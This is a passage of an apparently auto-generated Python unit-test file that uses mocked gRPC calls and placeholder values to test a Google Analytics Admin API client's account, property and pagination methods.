    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_account), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.Account(
                name="name_value",
                display_name="display_name_value",
                region_code="region_code_value",
                deleted=True,
            )
        )
        response = await client.update_account(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateAccountRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.Account)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.region_code == "region_code_value"
    assert response.deleted is True


@pytest.mark.asyncio
async def test_update_account_async_from_dict():
    await test_update_account_async(request_type=dict)


def test_update_account_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateAccountRequest()

    request.account.name = "account.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_account), "__call__") as call:
        call.return_value = resources.Account()
        client.update_account(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "account.name=account.name/value",) in kw[
        "metadata"
    ]


@pytest.mark.asyncio
async def test_update_account_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateAccountRequest()

    request.account.name = "account.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_account), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account())

        await client.update_account(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "account.name=account.name/value",) in kw[
        "metadata"
    ]


def test_update_account_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_account), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Account()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_account(
            account=resources.Account(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].account == resources.Account(name="name_value")
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


def test_update_account_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.update_account(
            analytics_admin.UpdateAccountRequest(),
            account=resources.Account(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


@pytest.mark.asyncio
async def test_update_account_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_account), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Account()

        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.update_account(
            account=resources.Account(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].account == resources.Account(name="name_value")
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


@pytest.mark.asyncio
async def test_update_account_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_account(
            analytics_admin.UpdateAccountRequest(),
            account=resources.Account(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


def test_provision_account_ticket(
    transport: str = "grpc", request_type=analytics_admin.ProvisionAccountTicketRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.provision_account_ticket), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ProvisionAccountTicketResponse(
            account_ticket_id="account_ticket_id_value",
        )
        response = client.provision_account_ticket(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ProvisionAccountTicketRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, analytics_admin.ProvisionAccountTicketResponse)
    assert response.account_ticket_id == "account_ticket_id_value"


def test_provision_account_ticket_from_dict():
    test_provision_account_ticket(request_type=dict)


def test_provision_account_ticket_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.provision_account_ticket), "__call__"
    ) as call:
        client.provision_account_ticket()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ProvisionAccountTicketRequest()


@pytest.mark.asyncio
async def test_provision_account_ticket_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ProvisionAccountTicketRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.provision_account_ticket), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ProvisionAccountTicketResponse(
                account_ticket_id="account_ticket_id_value",
            )
        )
        response = await client.provision_account_ticket(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ProvisionAccountTicketRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, analytics_admin.ProvisionAccountTicketResponse)
    assert response.account_ticket_id == "account_ticket_id_value"


@pytest.mark.asyncio
async def test_provision_account_ticket_async_from_dict():
    await test_provision_account_ticket_async(request_type=dict)


def test_list_account_summaries(
    transport: str = "grpc", request_type=analytics_admin.ListAccountSummariesRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_account_summaries), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListAccountSummariesResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_account_summaries(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListAccountSummariesRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListAccountSummariesPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_account_summaries_from_dict():
    test_list_account_summaries(request_type=dict)


def test_list_account_summaries_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_account_summaries), "__call__"
    ) as call:
        client.list_account_summaries()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListAccountSummariesRequest()


@pytest.mark.asyncio
async def test_list_account_summaries_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ListAccountSummariesRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_account_summaries), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListAccountSummariesResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_account_summaries(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListAccountSummariesRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListAccountSummariesAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_list_account_summaries_async_from_dict():
    await test_list_account_summaries_async(request_type=dict)


def test_list_account_summaries_pager():
    # NOTE(review): the credentials class (not an instance) is passed here; this
    # matches the other pager tests in this generated file — confirm intentional.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_account_summaries), "__call__"
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[], next_page_token="def",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[resources.AccountSummary(),], next_page_token="ghi",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
            ),
            RuntimeError,
        )

        metadata = ()
        pager = client.list_account_summaries(request={})

        assert pager._metadata == metadata

        results = [i for i in pager]
        assert len(results) == 6
        assert all(isinstance(i, resources.AccountSummary) for i in results)


def test_list_account_summaries_pages():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_account_summaries), "__call__"
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[], next_page_token="def",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[resources.AccountSummary(),], next_page_token="ghi",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
            ),
            RuntimeError,
        )
        pages = list(client.list_account_summaries(request={}).pages)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


@pytest.mark.asyncio
async def test_list_account_summaries_async_pager():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_account_summaries),
        "__call__",
        new_callable=mock.AsyncMock,
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[], next_page_token="def",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[resources.AccountSummary(),], next_page_token="ghi",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
            ),
            RuntimeError,
        )
        async_pager = await client.list_account_summaries(request={},)
        assert async_pager.next_page_token == "abc"
        responses = []
        async for response in async_pager:
            responses.append(response)

        assert len(responses) == 6
        assert all(isinstance(i, resources.AccountSummary) for i in responses)


@pytest.mark.asyncio
async def test_list_account_summaries_async_pages():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_account_summaries),
        "__call__",
        new_callable=mock.AsyncMock,
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[], next_page_token="def",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[resources.AccountSummary(),], next_page_token="ghi",
            ),
            analytics_admin.ListAccountSummariesResponse(
                account_summaries=[
                    resources.AccountSummary(),
                    resources.AccountSummary(),
                ],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_account_summaries(request={})).pages:
            pages.append(page_)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


def test_get_property(
    transport: str = "grpc", request_type=analytics_admin.GetPropertyRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_property), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Property(
            name="name_value",
            parent="parent_value",
            display_name="display_name_value",
            industry_category=resources.IndustryCategory.AUTOMOTIVE,
            time_zone="time_zone_value",
            currency_code="currency_code_value",
            service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD,
        )
        response = client.get_property(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetPropertyRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.Property)
    assert response.name == "name_value"
    assert response.parent == "parent_value"
    assert response.display_name == "display_name_value"
    assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE
    assert response.time_zone == "time_zone_value"
    assert response.currency_code == "currency_code_value"
    assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD


def test_get_property_from_dict():
    test_get_property(request_type=dict)


def test_get_property_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_property), "__call__") as call:
        client.get_property()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetPropertyRequest()


@pytest.mark.asyncio
async def test_get_property_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.GetPropertyRequest
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_property), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.Property(
                name="name_value",
                parent="parent_value",
                display_name="display_name_value",
                industry_category=resources.IndustryCategory.AUTOMOTIVE,
                time_zone="time_zone_value",
                currency_code="currency_code_value",
                service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD,
            )
        )
        response = await client.get_property(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetPropertyRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.Property)
    assert response.name == "name_value"
    assert response.parent == "parent_value"
    assert response.display_name == "display_name_value"
    assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE
    assert response.time_zone == "time_zone_value"
    assert response.currency_code == "currency_code_value"
    assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD


@pytest.mark.asyncio
async def test_get_property_async_from_dict():
    await test_get_property_async(request_type=dict)


def test_get_property_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetPropertyRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_property), "__call__") as call:
        call.return_value = resources.Property()
        client.get_property(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_property_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetPropertyRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_property), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property())

        await client.get_property(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_property_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_property), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Property()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_property(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_get_property_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_property(
            analytics_admin.GetPropertyRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_get_property_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_property), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Property()

        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.get_property(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_get_property_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.get_property(
            analytics_admin.GetPropertyRequest(), name="name_value",
        )


def test_list_properties(
    transport: str = "grpc", request_type=analytics_admin.ListPropertiesRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_properties), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListPropertiesResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_properties(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListPropertiesRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListPropertiesPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_properties_from_dict():
    test_list_properties(request_type=dict)


def test_list_properties_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_properties), "__call__") as call:
        client.list_properties()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListPropertiesRequest()


@pytest.mark.asyncio
async def test_list_properties_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.ListPropertiesRequest
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_properties), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListPropertiesResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_properties(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListPropertiesRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListPropertiesAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_list_properties_async_from_dict():
    await test_list_properties_async(request_type=dict)


def test_list_properties_pager():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_properties), "__call__") as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListPropertiesResponse(
                properties=[
                    resources.Property(),
                    resources.Property(),
                    resources.Property(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[], next_page_token="def",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(),], next_page_token="ghi",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(), resources.Property(),],
            ),
            RuntimeError,
        )

        metadata = ()
        pager = client.list_properties(request={})

        assert pager._metadata == metadata

        results = [i for i in pager]
        assert len(results) == 6
        assert all(isinstance(i, resources.Property) for i in results)


def test_list_properties_pages():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_properties), "__call__") as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListPropertiesResponse(
                properties=[
                    resources.Property(),
                    resources.Property(),
                    resources.Property(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[], next_page_token="def",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(),], next_page_token="ghi",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(), resources.Property(),],
            ),
            RuntimeError,
        )
        pages = list(client.list_properties(request={}).pages)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


@pytest.mark.asyncio
async def test_list_properties_async_pager():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_properties), "__call__", new_callable=mock.AsyncMock
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListPropertiesResponse(
                properties=[
                    resources.Property(),
                    resources.Property(),
                    resources.Property(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[], next_page_token="def",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(),], next_page_token="ghi",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(), resources.Property(),],
            ),
            RuntimeError,
        )
        async_pager = await client.list_properties(request={},)
        assert async_pager.next_page_token == "abc"
        responses = []
        async for response in async_pager:
            responses.append(response)

        assert len(responses) == 6
        assert all(isinstance(i, resources.Property) for i in responses)


@pytest.mark.asyncio
async def test_list_properties_async_pages():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_properties), "__call__", new_callable=mock.AsyncMock
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListPropertiesResponse(
                properties=[
                    resources.Property(),
                    resources.Property(),
                    resources.Property(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[], next_page_token="def",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(),], next_page_token="ghi",
            ),
            analytics_admin.ListPropertiesResponse(
                properties=[resources.Property(), resources.Property(),],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_properties(request={})).pages:
            pages.append(page_)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


def test_create_property(
    transport: str = "grpc", request_type=analytics_admin.CreatePropertyRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_property), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Property(
            name="name_value",
            parent="parent_value",
            display_name="display_name_value",
            industry_category=resources.IndustryCategory.AUTOMOTIVE,
            time_zone="time_zone_value",
            currency_code="currency_code_value",
            service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD,
        )
        response = client.create_property(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreatePropertyRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.Property)
    assert response.name == "name_value"
    assert response.parent == "parent_value"
    assert response.display_name == "display_name_value"
    assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE
    assert response.time_zone == "time_zone_value"
    assert response.currency_code == "currency_code_value"
    assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD


def test_create_property_from_dict():
    test_create_property(request_type=dict)


def test_create_property_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_property), "__call__") as call:
        client.create_property()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreatePropertyRequest()


@pytest.mark.asyncio
async def test_create_property_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.CreatePropertyRequest
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_property), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.Property(
                name="name_value",
                parent="parent_value",
                display_name="display_name_value",
                industry_category=resources.IndustryCategory.AUTOMOTIVE,
                time_zone="time_zone_value",
                currency_code="currency_code_value",
                service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD,
            )
        )
        response = await client.create_property(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
